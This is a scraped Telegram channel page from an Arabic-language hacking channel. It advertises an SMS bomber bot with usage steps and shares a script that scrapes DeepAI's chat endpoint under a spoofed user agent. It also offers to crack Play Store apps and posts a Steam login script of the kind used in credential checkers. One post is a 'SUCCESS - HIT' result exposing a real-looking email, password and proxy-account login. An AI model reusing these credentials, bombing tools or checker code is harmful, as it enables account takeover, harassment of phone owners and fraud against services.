Арабский питон
Kanalga Telegram’da o‘tish
Привет @durov Канал не нарушает правила Telegram. Нет спама, оскорблений, порнографии или нзаконной торговли. Пожалуйста, пересмотрите жалобы. Спасибо!
Ko'proq ko'rsatish2 386
Obunachilar
-2024 soatlar
-3327 kunlar
-2 10030 kunlar
Postlar arxiv
2 350
🚀 SMS BOMBER GLOBAL | الإصدار العالمي من JNRAL
أقوى وأسرعت بوت دولي لإرسال الرسائل على منصة تيليجرام! 🐆
[ 🔥 مميزات البوت ]
❤️ السرعة: إرسال فائق السرعة مع ضمان عدم الحظر.
🌎 النطاق العالمي: يدعم جميع دول العالم دون استثناء.
⭐ التحديث: واجهات برمجة التطبيقات (APIs) تعمل بشكل مستمر على مدار الساعة.
🔓 الأمان: حماية تامة لخصوصية المستخدم.
[ 🔥 طريقة الاستخدام ]
يرجى إرسال الرقم مع مفتاح الدولة (مثال: +964...) للاستفادة من قدرات الإرسال.
👑 المطور: JNRAL
🔑 اسم المستخدم: @r_9he
✅ رابط البوت: [ @G_d_bbot ]
شرح تفصيلي للمستخدمين الجدد حول طريقة تشغيل البوت:
أولاً، يُرجى تحديد رمز الدولة الخاص بك.
+964
ثانياً، يجب إدخال الرقم الوطني بدون الصفر الأول وبدون مسافات، مع إضافة رمز الدولة، بحيث يكون التنسيق كالتالي:
+96412345678
وبهذا تكون العملية مكتملة.
2 350
• بالمناسبة، ضفت تحويل نقاط بالدعوة.
• عدلت النانو بانانا صار يوضح الصور بدقة فوگ 4K ول VIP بدقة 4K+ اقوى من قبل.
• صار يدعم الرسم، تكله حوله رسم وتلوين، تدزله صورة مانگا يلونها الك (لازم تگله اسم الانمي اذا مامشهور).
• حاولت ادربه قدر الامكان على عدة اشياء.
• البوت اذا حاب تستعمل: @l_v_eBOT.
• كود ينطيك 10 نقاط لحسابك:PT82284325961777911109161696
• By the way, I added a point conversion feature for invitations.
• I modified the Nano Banana; it now displays images in 4K resolution, and the VIP version in 4K+ resolution, which is even better than before.
• It now supports drawing; you can tell it to draw and color, or send it a manga image and it will color it for you (you have to tell it the anime's name if it's not a popular one).
• I tried to train it as much as possible on several things.
• The bot's username if you want to use it: @l_v_eBOT.
• Code that gives you 10 points for your account: PT822843259617779111091616962 350
import requests
import uuid
import json
from fake_useragent import UserAgent
ua = UserAgent()
url = "https://api.deepai.org/hacking_is_a_serious_crime"
headers = {
'User-Agent': ua.random,
'origin': "https://deepai.org"
}
while True:
user = input("message: ")
payload = {
'chat_style': 'chat',
'chatHistory': json.dumps([{"role": "user", "content": user}]),
'model': 'standard',
'session_uuid': str(uuid.uuid4()),
'sensitivity_request_id': str(uuid.uuid4()),
'hacker_is_stinky': 'very_stinky',
'enabled_tools': '["image_generator","image_editor"]'
}
response = requests.post(url, data=payload, headers=headers)
print(response.text)
Api Ai2 350
دزولـي تـطـبـيـقـات او الــعـــــاب اجـرب اكــــــسـرهـن مـن مـتجر بلي او كوكل 🛒
واسويلكم عليهن ادوات او اسحبلكم اتصال🐍
عادي تكون بهاي الصيغه
[apks,apk]👻
Username •.•.~@r_9he✅
2 350
import requests
import re
import urllib.parse
import time
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
import base64
session = requests.Session()
currenttime = str(int(time.time()))
username = input('username : ')
password = input('password : ')
usernameclean = re.sub(r"@.*", "", username)
url1 = "https://steamcommunity.com/login/getrsakey/"
data1 = f"donotcache={currenttime}&username={usernameclean}"
headers1 = {
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Origin": "https://steamcommunity.com",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1',
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-us"
}
response1 = session.post(url1, data=data1, headers=headers1)
json1 = response1.json()
publickeymod = json1["publickey_mod"]
publickeyexp = json1["publickey_exp"]
timestamp = str(json1["timestamp"])
modint = int(publickeymod, 16)
expint = int(publickeyexp, 16)
key = RSA.construct((modint, expint))
cipher = PKCS1_v1_5.new(key)
encrypted = cipher.encrypt(password.encode('utf-8'))
encryptedpassword = base64.b64encode(encrypted).decode('utf-8')
passwordurlencoded = urllib.parse.quote(encryptedpassword)
url2 = "https://steamcommunity.com/login/dologin/"
data2 = f"donotcache={currenttime}&password={passwordurlencoded}&username={usernameclean}&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp={timestamp}&remember_login=false&oauth_client_id=3638BFB1"
headers2 = {
"Accept": "*/*",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"Origin": "https://steamcommunity.com",
"X-Requested-With": "XMLHttpRequest",
"User-Agent": 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Mobile/15E148 Safari/604.1',
"Referer": "https://steamcommunity.com/mobilelogin?oauth_client_id=3638BFB1&oauth_scope=read_profile%20write_profile%20read_client%20write_client",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-us"
}
response2 = session.post(url2, data=data2, headers=headers2)
print(response2.text)
login steam2 350
SUCCESS - HIT #2
========================
Email: foldndu@gmail.com
Password: Cee2424@
InFo :
Plan 1: Residential Proxy / Plan 1
Login: ec5f71c59213b217d29e
Pass: da3e72de03f9dabb
Balance: -2.7 MB
Threads: 2000
Date: 06/05/2025
Affiliate:
========================
API Plans Response:
{'data': [{'date': '06/05/2025', 'plan_id': 410355, 'label': 'Residential Proxy / Plan 1', 'login': 'ec5f71c59213b217d29e', 'password': 'da3e72de03f9dabb', 'product': 'proxy', 'charge_type': 'traffic', 'threads': 2000, 'trial': False, 'has_subscription': False, 'has_subscription_paused': False, 'subscription_count_limit': 0, 'subscription_charge_amount': 0, 'subscription_charge_type': None, 'pool': [], 'pool_type': 'residental', 'sticky_range_start': 10000, 'sticky_range_end': 20000, 'min_payment_amount': 1, 'min_traffic_count': 0, 'min_requests_count': 0, 'default_pool_params': '{"countries":["us"],"exclude_countries":null,"exclude_asn":[],"anonymous":true,"session_ttl":5,"cities":null,"states":null,"postal_codes":null,"asns":null}', 'custom_price_data': None, 'is_hide': False, 'balance': -2831060, 'balance_format': '-2.7 MB', 'price_per_value': 1}]}
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
